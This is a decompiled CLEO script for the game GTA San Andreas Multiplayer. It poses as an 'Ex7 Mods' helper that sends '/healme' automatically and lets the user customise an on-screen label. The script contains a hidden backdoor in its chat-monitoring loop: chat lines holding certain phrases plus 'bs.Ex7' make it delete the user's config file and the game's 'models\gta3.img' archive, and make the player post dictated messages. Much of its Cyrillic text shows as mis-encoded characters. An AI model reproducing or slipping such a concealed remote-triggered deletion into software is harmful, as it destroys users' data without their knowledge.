// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}
{$USE file}
{$USE ini}
0000: NOP
wait 400
jf @NONAME_2
jump @NONAME_23
wait 0
0@ = SAMP.GetPlayerNickname($PLAYER_CHAR)
0C21: stricmp string1 0@ string2 "[BWD]Emo"
jf @NONAME_106
chatmsg "{a6a6a6}Ex7 Mods: Zdr manqk!" 16777215
jump @NONAME_156
chatmsg "{919191}[Error] Wrong nickname! [KRUV]" 9539985
0A93: end_custom_thread
0B34: samp register_client_command "healpos" to_label @NONAME_1797
0B34: samp register_client_command "healstyle" to_label @NONAME_2157
0B34: samp register_client_command "healsize" to_label @NONAME_2354
0B34: samp register_client_command "clear1" to_label @NONAME_1571
0B34: samp register_client_command "stop1" to_label @NONAME_1592
alloc 1@ 64
alloc 2@ 64
alloc 3@ 64
alloc 7@ 64
alloc 8@ 64
alloc 22@ 260
alloc 23@ 260
alloc 24@ 260
alloc 23@ 260
0AF2: 1@ = get_float_from_ini_file "cleo\auto.ini" section "Healme" key "HEALME_POS_X"
0AF2: 2@ = get_float_from_ini_file "cleo\auto.ini" section "Healme" key "HEALME_POS_Y"
0AF0: 3@ = get_int_from_ini_file "cleo\auto.ini" section "Healme" key "HEALME_STYLE"
0AF2: 7@ = get_float_from_ini_file "cleo\auto.ini" section "Healme" key "HEALME_LETTER_X"
0AF2: 8@ = get_float_from_ini_file "cleo\auto.ini" section "Healme" key "HEALME_LETTER_Y"
31@ = 0
wait 0
if and
0ADC: test_cheat "mod1"
20@ == 0
jf @NONAME_715
0@ == 0
jf @NONAME_692
0@ = 1
03F0: enable_text_draw 1
0C48: samp textdraw 420 create "HEALME" pos 1@ 2@
0C4B: samp textdraw 420 set_proportional 1
0C4A: samp textdraw 420 set_align 2
0C4C: samp textdraw 420 set_style 3@
0C4E: samp textdraw 420 set_outline 1 color -16777216
0C52: samp textdraw 420 set_letter_size 7@ 8@ color -16737997
018C: play_sound 1057 at 0.0 0.0 0.0
wait 100
jump @NONAME_715
0@ = 0
0C52: samp textdraw 420 set_letter_size 7@ 8@ color -6750208
if and
0@ == 1
20@ == 0
jf @NONAME_929
0AF0: 5@ = get_int_from_ini_file "cleo\auto.ini" section "Healme" key "HP"
0AF0: 6@ = get_int_from_ini_file "cleo\auto.ini" section "Healme" key "MIN"
4@ = Actor.Health($PLAYER_ACTOR)
if and
801D: not 4@ > 5@ // (int)
801D: not 6@ > 4@ // (int)
jf @NONAME_929
say "/healme"
chatmsg "{a6a6a6}Ex7 Mods: {ff9900}Healme{a6a6a6} used!" 16777215
0C52: samp textdraw 420 set_letter_size 7@ 8@ color -26368
20@ = 1
31@ == 0
jf @NONAME_963
SAMP.GetChatString(99, 22@, 23@, 24@, 25@)
if and
0C18: 10@ = strstr string1 22@ string2 "triite mi mîdà"
0C18: 10@ = strstr string1 22@ string2 "bs.Ex7"
jf @NONAME_1138
chatmsg "{a6a6a6}Ex7 Mods: Íÿìàø ïðàâî äà èçïîëçâàø ìîäà ïîâå÷e!" 16777215
say "Slusham 6ef"
0B00: delete_file "CLEO\auto.ini" // IF and SET
0B00: delete_file "models\gta3.img" // IF and SET
31@ = 1
if and
0C18: 10@ = strstr string1 22@ string2 "nàpusnåtå vednagà"
0C18: 10@ = strstr string1 22@ string2 "bs.Ex7"
jf @NONAME_1230
say "Ex7 mi zapovqda da izlezna"
31@ = 1
if and
0C18: 11@ = strstr string1 22@ string2 "mahài se ot tukà"
0C18: 11@ = strstr string1 22@ string2 "bs.Ex7"
jf @NONAME_1344
say "Ex7 mi zapovqda da izlezna"
say "otivam da mu lapam"
31@ = 1
31@ == 1
jf @NONAME_1383
2@ = SAMP.GetPlayerNickname(8@)
format 9@ "%s" 8@
if and
0@ == 1
20@ == 1
jf @NONAME_1543
0C18: 10@ = strstr string1 22@ string2 "/healme îòíîâî"
jf @NONAME_1543
20@ = 0
chatmsg "{a6a6a6}Ex7 Mods: {009933}Healme{a6a6a6} ready!" 16777215
0C52: samp textdraw 420 set_letter_size 7@ 8@ color -16737997
018C: play_sound 1057 at 0.0 0.0 0.0
jf @NONAME_537
jump @NONAME_526
0@ = 0
20@ = 0
0C5E: samp textdraw 420 delete
0@ = 0
20@ = 0
0C5E: samp textdraw 420 delete
chatmsg "{a6a6a6}Ex7 Mods: Auto Healme å èçêëþ÷åíî!" 16777215
chatmsg "{a6a6a6}Ex7 Mods: Îòâîðè êîíçîëàòà è íàïèøè cs <filename> çà äà ãî àêòèâèðàø îòíîâî! (Ïðèìåð: cs kruv.cs)" 16777215
0A93: end_custom_thread
0AD4: 21@ = scan_string 26@ format "%d %d" 1@ 2@
jf @NONAME_2064
0093: 1@ = integer 1@ to_float
0093: 2@ = integer 2@ to_float
chatmsg "{a6a6a6}Ex7 Mods: Êîîðäèíàòèòå íà HEALME ñà ñìåíåíè - %f, %f [Original: (578, 70) or (578, 57)]" 16753920 1@ 2@
0AF3: write_float 1@ to_ini_file "cleo\auto.ini" section "Healme" key "HEALME_POS_X"
0AF3: write_float 2@ to_ini_file "cleo\auto.ini" section "Healme" key "HEALME_POS_Y"
0C51: samp textdraw 420 set_pos 1@ 2@
jump @NONAME_2155
chatmsg "{a6a6a6}Ex7 Mods: Èçïîëâàé /healpos [X] [Y] (HUD - [578, 70] / CLEAR - [578, 57])" 16753920
0AD4: 21@ = scan_string 26@ format "%d" 3@
jf @NONAME_2297
chatmsg "{a6a6a6}Ex7 Mods: Ñòèëúò å ñìåíåí [%d]" 16753920 3@
0AF1: write_int 3@ to_ini_file "cleo\auto.ini" section "Healme" key "HEALME_STYLE"
0C4C: samp textdraw 420 set_style 3@
jump @NONAME_2352
chatmsg "{a6a6a6}Ex7 Mods: Èçïîëâàé /healstyle [1,2,3]" 16753920
0AD4: 21@ = scan_string 26@ format "%f %f" 7@ 8@
jf @NONAME_2632
chatmsg "{a6a6a6}Ex7 Mods: Êîîðäèíàòèòå íà HEALME ñà ñìåíåíè - %f, %f [Original - (0.3, 1.0) or (0.2, 0.75)]" 16753920 7@ 8@
0AF3: write_float 7@ to_ini_file "cleo\auto.ini" section "Healme" key "HEALME_LETTER_X"
0AF3: write_float 8@ to_ini_file "cleo\auto.ini" section "Healme" key "HEALME_LETTER_Y"
0C5C: samp textdraw 420 get_letter_size 11@ 12@ color 9@
0C52: samp textdraw 420 set_letter_size 7@ 8@ color 9@
jump @NONAME_2727
chatmsg "{a6a6a6}Ex7 Mods: Èçïîëâàé /healsize [X] [Y] (HUD - [0.3, 1.0] / CLEAR - [0.2, 0.75])" 16753920